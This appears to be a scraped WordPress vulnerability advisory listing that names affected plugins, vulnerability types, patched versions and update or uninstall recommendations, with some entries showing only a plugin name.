Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 0.9.69
Recommended Action: Update to version 0.9.69, or a newer patched version

Plugin: Portfolio – WordPress Portfolio Plugin

Vulnerability: Cross-Site Request Forgery in rtport_spare_me
Patched Version: 2.8.9
Recommended Action: Update to version 2.8.9, or a newer patched version

Plugin: WP Category Post List Widget

Plugin: Portrait-Archiv.com Photostore

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: 3D FlipBook – PDF Embedder, PDF Flipbook Viewer, Flipbook Image Gallery

Vulnerability: Subscriber+ Stored Cross-Site Scripting
Patched Version: 1.12.1
Recommended Action: Update to version 1.12.1, or a newer patched version

Plugin: Leads and Visitor Insights

Vulnerability: Authorization Bypass
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Export All Posts, Products, Orders, Refunds & Users

Vulnerability: SQL Injection
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: wp-football

Plugin: Form Builder CP

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.32
Recommended Action: Update to version 1.2.32, or a newer patched version

Plugin: EU Cookie Law for GDPR/CCPA

Plugin: NextScripts: Social Networks Auto-Poster

Vulnerability: Reflected Cross-Site Scripting via code
Patched Version: 4.4.3
Recommended Action: Update to version 4.4.3, or a newer patched version

Plugin: Helpful

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 4.4.59
Recommended Action: Update to version 4.4.59, or a newer patched version

Plugin: AGCA – Custom Dashboard & Login Page

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 6.9
Recommended Action: Update to version 6.9, or a newer patched version

Plugin: Visual Website Collaboration, Feedback & Project Management – Atarim

Vulnerability: Client Interface <= 3.9.1
Patched Version: 3.9.2
Recommended Action: Update to version 3.9.2, or a newer patched version

Plugin: CKEditor for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.5.3.1
Recommended Action: Update to version 4.5.3.1, or a newer patched version

Plugin: IBPS Online Exam Plugin for WordPress

Core: WordPress

Vulnerability: Cross-Site Scripting via Customizer
Patched Version: 3.7.15
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.15, 3.8.15, 3.9.13, 4.0.12, 4.1.12, 4.2.9, 4.3.5, 4.4.4, 4.5.3

Plugin: Dyslexiefont Free

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: RokStories

Vulnerability: Denial of Service
Patched Version: 1.26
Recommended Action: Update to version 1.26, or a newer patched version

Plugin: Author Box, Guest Author and Co-Authors for Your Posts – Molongui

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.6.20
Recommended Action: Update to version 4.6.20, or a newer patched version

Plugin: Simple Ticker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.06
Recommended Action: Update to version 3.06, or a newer patched version

Plugin: Rich Reviews by Starfish

Vulnerability: SQL Injection
Patched Version: 1.9.6
Recommended Action: Update to version 1.9.6, or a newer patched version

Plugin: SpiderVPlayer

Plugin: WooCommerce

Vulnerability: Missing File Type Validation
Patched Version: 3.6.5
Recommended Action: Update to version 3.6.5, or a newer patched version

Plugin: Poll, Survey, Questionnaire and Voting system

Vulnerability: Unauthenticated Blind SQL Injection
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.5
Recommended Action: Update to version 2.9.5, or a newer patched version

Plugin: Shield: Blocks Bots, Protects Users, and Prevents Security Breaches

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 17.0.18
Recommended Action: Update to version 17.0.18, or a newer patched version

Plugin: WooCommerce Ship to Multiple Addresses

Vulnerability: Insecure Direct Object Reference
Patched Version: 3.8.4
Recommended Action: Update to version 3.8.4, or a newer patched version

Plugin: Motors – Car Dealer, Classifieds & Listing

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: PCA Predict

Plugin: Simple URLs – Link Cloaking, Product Displays, and Affiliate Link Management

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 115
Recommended Action: Update to version 115, or a newer patched version

Plugin: Organization chart

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Cross-Site Request Forgery via admin_slides
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: Mail Masta

Vulnerability: SQL Injection via id parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gestion-Pymes

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: 4.1.5.2 Authorization Bypass
Patched Version: 4.1.5.3
Recommended Action: Update to version 4.1.5.3, or a newer patched version

Plugin: Simple Membership

Vulnerability: Authenticated (Admin+) SQL Injections
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Plugin: WooCommerce Warranty Requests

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: Dynamics 365 Integration

Vulnerability: Missing Authorization via wp_ajax_wpcrm_log & wp_ajax_wpcrm_log_verbosity
Patched Version: 1.3.13
Recommended Action: Update to version 1.3.13, or a newer patched version

Plugin: Tiny carousel horizontal slider plus

Plugin: jRSS Widget

Vulnerability: Server-Side Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: External Videos

Plugin: Auto Hide Admin Bar

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Converter for Media – Optimize images | Convert WebP & AVIF

Vulnerability: Unauthenticated Open Redirect
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: bbp style pack

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 5.6.8
Recommended Action: Update to version 5.6.8, or a newer patched version

Plugin: reCaptcha by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.28
Recommended Action: Update to version 1.28, or a newer patched version

Plugin: Mondial Relay & Chronopost plugin for WooCommerce – WCMultiShipping

Vulnerability: WCMultiShipping <= 2.3.7
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: contus-video-comments

Vulnerability: Remote File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WHA Crossword

Plugin: wpDataTables (Premium)

Vulnerability: Blind SQL Injection via length Parameter
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Simple Link Directory

Vulnerability: Unauthenticated SQL Injection
Patched Version: 7.7.2
Recommended Action: Update to version 7.7.2, or a newer patched version

Plugin: XML for Google Merchant Center

Vulnerability: Reflected Cross-Site Scripting via page parameter
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Member Hero

Plugin: AFS Analytics

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.16
Recommended Action: Update to version 4.16, or a newer patched version

Plugin: Visual Form Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Authentication Bypass
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: Poll Maker – Versus Polls, Anonymous Polls, Image Polls

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: Pricing Table by Supsystic

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting and Setting Changes
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: WP SEO Tags

Plugin: Kanban Boards for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.5.21
Recommended Action: Update to version 2.5.21, or a newer patched version

Plugin: Booqable Rental Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.4.16
Recommended Action: Update to version 2.4.16, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: Authenticated SQL Injection via order & orderby Parameters
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: Login with phone number

Vulnerability: Unauthenticated Remote Plugin Deletion
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: Permalink Manager Lite

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.20.2
Recommended Action: Update to version 2.2.20.2, or a newer patched version

Plugin: BulletProof Security

Vulnerability: Cross-Site Scripting
Patched Version: .52.5
Recommended Action: Update to version .52.5, or a newer patched version

Plugin: Testimonial WordPress Plugin – AP Custom Testimonial

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: Ultimate Addons for Contact Form 7

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.29
Recommended Action: Update to version 3.1.29, or a newer patched version

Plugin: Dropshipping & Affiliation with Amazon

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Admin side data storage for Contact Form 7

Plugin: OneClick Chat to Order

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.4.2
Recommended Action: Update to version 1.0.4.2, or a newer patched version

Plugin: Yandex Metrica Counter

Plugin: WooCommerce Menu Extension

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Cross-Site Scripting
Patched Version: 4.3.1
Recommended Action: Update to version 4.3.1, or a newer patched version

Plugin: Auto Affiliate Links

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.4.2.6
Recommended Action: Update to version 6.4.2.6, or a newer patched version

Plugin: Image Export

Vulnerability: Path Traversal
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: SAML Single Sign On – SSO Login

Vulnerability: Cross-Site Scripting
Patched Version: 4.8.73
Recommended Action: Update to version 4.8.73, or a newer patched version

Plugin: MasterStudy LMS WordPress Plugin – for Online Courses and Education

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.0.9
Recommended Action: Update to version 3.0.9, or a newer patched version

Plugin: LayerSlider

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.2.1
Recommended Action: Update to version 6.2.1, or a newer patched version

Plugin: AnyMind Widget

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: DOM-based Cross-Site Scripting
Patched Version: 3.4.8
Recommended Action: Update to version 3.4.8, or a newer patched version

Plugin: Trust Payments Gateway for WooCommerce (JavaScript Library)

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Core: WordPress

Vulnerability: Denial of Service via oEmbed Protocol
Patched Version: 3.7.15
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.15, 3.8.15, 3.9.13, 4.0.12, 4.1.12, 4.2.9, 4.3.5, 4.4.4, 4.5.3

Plugin: Media File Renamer: Rename for better SEO (AI-Powered)

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.9.4
Recommended Action: Update to version 1.9.4, or a newer patched version

Plugin: Download Monitor

Vulnerability: Cross-Site Scripting via sort Parameter
Patched Version: 3.3.6.2
Recommended Action: Update to version 3.3.6.2, or a newer patched version

Plugin: qTranslate X

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.4.4
Recommended Action: Update to version 3.4.4, or a newer patched version

Plugin: ShortPixel Adaptive Images – WebP, AVIF, CDN, Image Optimization

Vulnerability: Subscriber+ Arbitrary Settings Update
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.1.8
Recommended Action: Update to version 3.1.8, or a newer patched version

Plugin: Display Widgets

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 2.04
Recommended Action: Update to version 2.04, or a newer patched version

Plugin: WCP Contact Form

Vulnerability: Missing Authorization via downloadCsv
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Activity Log

Vulnerability: Authenticated(Administrator+) SQL Injection via txtsearch
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Complianz Premium – GDPR/CCPA Cookie Consent

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.4.8
Recommended Action: Update to version 6.4.8, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery via ‘wpfc_start_cdn_integration_ajax_request_callback’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: VR Calendar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: AJAX Random Posts

Vulnerability: PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.16.66
Recommended Action: Update to version 1.16.66, or a newer patched version

Plugin: Waiting: One-click countdowns

Vulnerability: Authenticated (Subscriber+) SQL Injection via ‘pbc_down[meta][id]’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Go Maps (formerly WP Google Maps)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.0.27
Recommended Action: Update to version 6.0.27, or a newer patched version

Plugin: Meta pixel for WordPress

Vulnerability: PHP Object Injection
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Podcast Subscribe Buttons

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4.9
Recommended Action: Update to version 1.4.9, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.74
Recommended Action: Update to version 3.74, or a newer patched version

Plugin: Fancy Product Designer

Vulnerability: Admin+ SQL Injection
Patched Version: 4.7.5
Recommended Action: Update to version 4.7.5, or a newer patched version

Plugin: Inspirational Quote Rotator

Plugin: WP Responsive Testimonials Slider And Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Podlove Podcast Publisher

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.8.4
Recommended Action: Update to version 3.8.4, or a newer patched version

Plugin: Visitor Traffic Real Time Statistics

Vulnerability: Subscriber+ SQL Injection
Patched Version: 3.9
Recommended Action: Update to version 3.9, or a newer patched version

Plugin: Rank Math SEO – AI SEO Tools to Dominate SEO Rankings

Vulnerability: Server-Side Request Forgery
Patched Version: 1.0.95.1
Recommended Action: Update to version 1.0.95.1, or a newer patched version

Plugin: Crowdsignal Dashboard – Polls, Surveys & more

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: MP3-jPlayer

Plugin: Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress

Vulnerability: Authenticated (Contributor+) SQL Injection
Patched Version: 8.0.1
Recommended Action: Update to version 8.0.1, or a newer patched version

Plugin: WooPayments: Integrated WooCommerce Payments

Vulnerability: Missing Authorization via redirect_pay_for_order_to_update_payment_method
Patched Version: 5.9.1
Recommended Action: Update to version 5.9.1, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Unauthenticated WordPress Options Changes via AJAX
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: rtMedia for WordPress, BuddyPress and bbPress

Vulnerability: Local File Inclusion
Patched Version: 3.7.19
Recommended Action: Update to version 3.7.19, or a newer patched version

Plugin: Contact Form 7

Vulnerability: Authorization Bypass
Patched Version: 5.0.4
Recommended Action: Update to version 5.0.4, or a newer patched version

Plugin: MapSVG

Vulnerability: SQL Injection
Patched Version: 6.2.20
Recommended Action: Update to version 6.2.20, or a newer patched version

Plugin: Event Notifier

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Google Alert and Twitter Plugin

Vulnerability: Multiple Vulnerabilities
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-Table

Vulnerability: Local File Inclusion
Patched Version: 1.44
Recommended Action: Update to version 1.44, or a newer patched version

Plugin: Simple Ads Manager

Vulnerability: Multiple SQL Injections
Patched Version: 2.7.97
Recommended Action: Update to version 2.7.97, or a newer patched version

Plugin: Flat Preloader

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Work The Flow File Upload

Vulnerability: Arbitrary File Upload
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Unauthenticated Arbitrary File Deletion
Patched Version: 7.0.1
Recommended Action: Update to version 7.0.1, or a newer patched version

Plugin: Simple Download Monitor

Vulnerability: Contributor+ Arbitrary Thumbnail Removal
Patched Version: 3.9.6
Recommended Action: Update to version 3.9.6, or a newer patched version

Plugin: WP STAGING WordPress Backup Plugin – Migration Backup Restore

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.9.18
Recommended Action: Update to version 2.9.18, or a newer patched version

Plugin: WP Mega Menu

Vulnerability: Unauthenticated Settings Update to Stored Cross-Site Scripting
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: Interactive Image Map Plugin – Draw Attention

Vulnerability: Missing Authorization to Arbitrary Post Featured Image Modification
Patched Version: 2.0.12
Recommended Action: Update to version 2.0.12, or a newer patched version

Plugin: Display Custom Post

Plugin: LB Mixed Slideshow for WordPress

Plugin: leenk.me

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.0
Recommended Action: Update to version 2.6.0, or a newer patched version

Plugin: Easy Digital Downloads – Upload File

Vulnerability: Arbitrary File Upload/Deletion
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Conversion Ninja

Plugin: Admin Management Xtended

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.5
Recommended Action: Update to version 2.4.5, or a newer patched version

Plugin: Facebook Survey Pro

Plugin: WP Domain Redirect

Plugin: Nexter Extension

Vulnerability: Authenticated(Editor+) Remote Code Execution via metabox
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: OnePress Social Locker

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.9.5
Recommended Action: Update to version 3.9.5, or a newer patched version

Plugin: Image Gallery – Responsive Photo Gallery

Vulnerability: SQL Injection
Patched Version: 1.9.0
Recommended Action: Update to version 1.9.0, or a newer patched version

Plugin: Upload Media By URL

Vulnerability: Cross-Site Request Forgery via ‘umbu_download’
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Redirection

Vulnerability: Cross-Site Request Forgery to Plugin Reset
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.3.4
Recommended Action: Update to version 1.5.3.4, or a newer patched version

Plugin: WP Super Cache

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.7.3
Recommended Action: Update to version 1.7.3, or a newer patched version

Plugin: Simple PopUp

Plugin: Chartify – WordPress Chart Plugin

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: CataBlog

Vulnerability: Authenticated (Editor+) Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Product Catalog Feed by PixelYourSite

Vulnerability: Reflected Cross-Site Scripting via ‘page’
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: MailChimp Forms by MailMunch

Vulnerability: Missing Authorization via multiple AJAX actions
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: Real Cookie Banner: GDPR & ePrivacy Cookie Consent

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.14.2
Recommended Action: Update to version 2.14.2, or a newer patched version

Plugin: Ketchup Restaurant Reservations

Plugin: Dokan – Powerful WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.6.6
Recommended Action: Update to version 3.6.6, or a newer patched version

Plugin: WooCommerce Cart & Floating Cart

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: MasterStudy LMS WordPress Plugin – for Online Courses and Education

Vulnerability: Unauthenticated Admin Account Creation
Patched Version: 2.7.6
Recommended Action: Update to version 2.7.6, or a newer patched version

Plugin: Simple Membership

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.3.9
Recommended Action: Update to version 4.3.9, or a newer patched version

Plugin: Auto Featured Image (Auto Post Thumbnail)

Vulnerability: Authenticated (Author+) Arbitrary File Upload
Patched Version: 3.9.16
Recommended Action: Update to version 3.9.16, or a newer patched version

Plugin: My Private Site

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: WP Forum Server

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.7.4
Recommended Action: Update to version 1.7.4, or a newer patched version

Plugin: proquoter

Plugin: miniOrange Discord Integration

Vulnerability: Missing Authorization to Plugin Options Update
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: YITH Request a Quote for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: Shortcode for Current Date

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: JSM file_get_contents() Shortcode

Vulnerability: Authenticated (Contributor+) Server-Side Request Forgery via Shortcode
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: Multi Step Form

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.13
Recommended Action: Update to version 1.7.13, or a newer patched version

Plugin: ALD – AliExpress Dropshipping and Fulfillment for WooCommerce Premium

Vulnerability: AliExpress Dropshipping and Fulfillment for WooCommerce Premium <= 1.1.0
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: File Manager

Vulnerability: Sensitive Information Exposure via Backup Filenames
Patched Version: 7.2.2
Recommended Action: Update to version 7.2.2, or a newer patched version

Plugin: Show-Hide / Collapse-Expand

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Ajax Search Lite – Live Search & Filter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.11.5
Recommended Action: Update to version 4.11.5, or a newer patched version

Plugin: ActiveDEMAND

Vulnerability: Missing Authorization Checks
Patched Version: 0.2.28
Recommended Action: Update to version 0.2.28, or a newer patched version

Plugin: Import / Export Customizer Settings

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Post Meta Data Manager

Vulnerability: Missing Authorization to Post, Term, and User Meta Deletion
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Ibtana – WordPress Website Builder

Vulnerability: Missing Authorization to Stored Cross-Site Scripting
Patched Version: 1.1.4.9
Recommended Action: Update to version 1.1.4.9, or a newer patched version

Plugin: CMS Tree Page View

Vulnerability: Reflected Cross-Site Scripting via ‘post_type’
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: Popup, Optin Form & Email Newsletters for Mailchimp, HubSpot, AWeber – MailOptin

Vulnerability: Missing Authorization to Cache Deletion
Patched Version: 1.2.50.0
Recommended Action: Update to version 1.2.50.0, or a newer patched version

Plugin: WP Guppy

Vulnerability: Information Disclosure
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Recently

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: Block IPs for Gravity Forms

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: gAppointments – Appointment booking addon for Gravity Forms

Vulnerability: Appointment booking addon for Gravity Forms <= 1.9.7
Patched Version: 1.10.0
Recommended Action: Update to version 1.10.0, or a newer patched version

Plugin: Social Media Widget by Acurax

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Auto Location for WP Job Manager

Vulnerability: Authenticated (Administrator+) Stored Cross Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Pods – Custom Content Types and Fields

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Click to Chat – HoliThemes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.18.1
Recommended Action: Update to version 3.18.1, or a newer patched version

Plugin: Export to Text

Vulnerability: Unauthenticated Post Export
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Universal Analytics

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Image Hover Effects for Elementor with Lightbox and Flipbox

Vulnerability: Caption Hover with Carousel <= 2.8
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: User Post Gallery – UPG

Vulnerability: UPG <= 2.19
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Open Redirect
Patched Version: 3.7.40
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.40, 3.8.40, 3.9.38, 4.0.37, 4.1.37, 4.2.34, 4.3.30, 4.4.29, 4.5.28, 4.6.25, 4.7.25, 4.8.21, 4.9.22, 5.0.18, 5.1.15, 5.2.17, 5.3.14, 5.4.12, 5.5.11, 5.6.10, 5.7.8, 5.8.6, 5.9.5, 6.0.3

Plugin: UniConsent CMP for IAB TCF GPP Consent Mode

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Question Title
Patched Version: 8.1.11
Recommended Action: Update to version 8.1.11, or a newer patched version

Plugin: LH Password Changer

Plugin: HD Quiz

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.8.4
Recommended Action: Update to version 1.8.4, or a newer patched version

Plugin: WP Js External Link Info

Plugin: Spam protection, Anti-Spam, FireWall by CleanTalk

